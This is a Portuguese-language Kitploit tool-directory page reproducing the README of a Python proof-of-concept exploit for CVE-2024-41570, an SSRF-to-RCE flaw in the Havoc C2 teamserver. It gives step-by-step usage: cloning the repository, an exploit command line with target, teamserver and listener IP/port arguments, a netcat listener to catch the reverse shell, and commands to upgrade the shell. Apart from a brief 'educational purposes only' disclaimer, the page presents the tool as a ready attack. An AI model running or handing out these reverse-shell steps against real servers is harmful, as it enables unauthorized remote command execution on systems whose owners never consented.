Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-41570 — Exploração automatizada de Reverse Shell via WebSocket | Havoc-C2-SSRF com RCE | Kitploit
Ferramentas/GitHubGitHub/diemoeve/cve-2024-41570
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploração automatizada de Reverse Shell via WebSocket | Havoc-C2-SSRF com RCE

Ver Repositório
12214há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-41570 | Havoc C2 SSRF com RCE | Exploração Automática de Reverse Shell via WebSocket

Este projeto fornece um script de prova de conceito (PoC) baseado em Python para explorar um serviço vulnerável baseado em WebSocket. O script automatiza o registro de agentes, a entrega de payloads via WebSocket e a execução remota de comandos para estabelecer um reverse shell.

Funcionalidades

  • Registra um agente no serviço de destino.
  • Abre um WebSocket e envia payloads de handshake e autenticação.
  • Executa comandos remotamente via reverse shell.
  • Fornece um fluxo de trabalho guiado com instruções claras.

Pré-requisitos

  • Python 3.x instalado na sua máquina.
  • Instale as dependências necessárias executando:
    root@kitploit:~
    pip install -r requirements.txt
    

Instalação

  1. Clone este repositório:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Navegue até o diretório do projeto:
root@kitploit:~
cd CVE-2024-41570
  • Instale as dependências:
    root@kitploit:~
    pip install -r requirements.txt
    
  • Uso

    Execute o script com os argumentos necessários:

    root@kitploit:~
    python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
    

    Argumentos

    • -t: URL de destino do servidor WebSocket.
    • -i: Endereço IP do Team Server do Havoc.
    • -p: Porta do Team Server do Havoc.
    • -U: Nome de usuário para autenticação no WebSocket.
    • -P: Senha para autenticação no WebSocket.
    • -l: IP do listener para o reverse shell (sua máquina).
    • -L: Porta do listener para o reverse shell (sua máquina).

    Exemplo de Comando

    root@kitploit:~
    python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
    

    Passos para Executar

    1. Certifique-se de que o serviço de destino está em execução e vulnerável.
    2. Execute o script com os parâmetros necessários.
    3. Em um terminal separado, inicie um listener:
      root@kitploit:~
      nc -lvnp <listener_port>
      
    4. Faça o upgrade do shell:
      root@kitploit:~
      python -c 'import pty; pty.spawn("/bin/bash")' 
      export TERM=xterm-256color
      stty rows 67 columns 318
      

    Dependências

    O script requer as seguintes bibliotecas Python:

    • requests
    • pycryptodome

    Instale-as usando o comando:

    root@kitploit:~
    pip install -r requirements.txt
    

    Aviso de Segurança

    Este script destina-se apenas a fins educacionais. Certifique-se de ter autorização explícita para testar o sistema de destino. O uso indevido deste script pode violar leis e diretrizes éticas.

    Referências

    Inspirado por Default Havoc Poc

    Contribuindo

    Contribuições são bem-vindas! Sinta-se à vontade para fazer um fork do repositório e enviar um pull request.

    Licença

    Este projeto é licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.

    Baixar ferramenta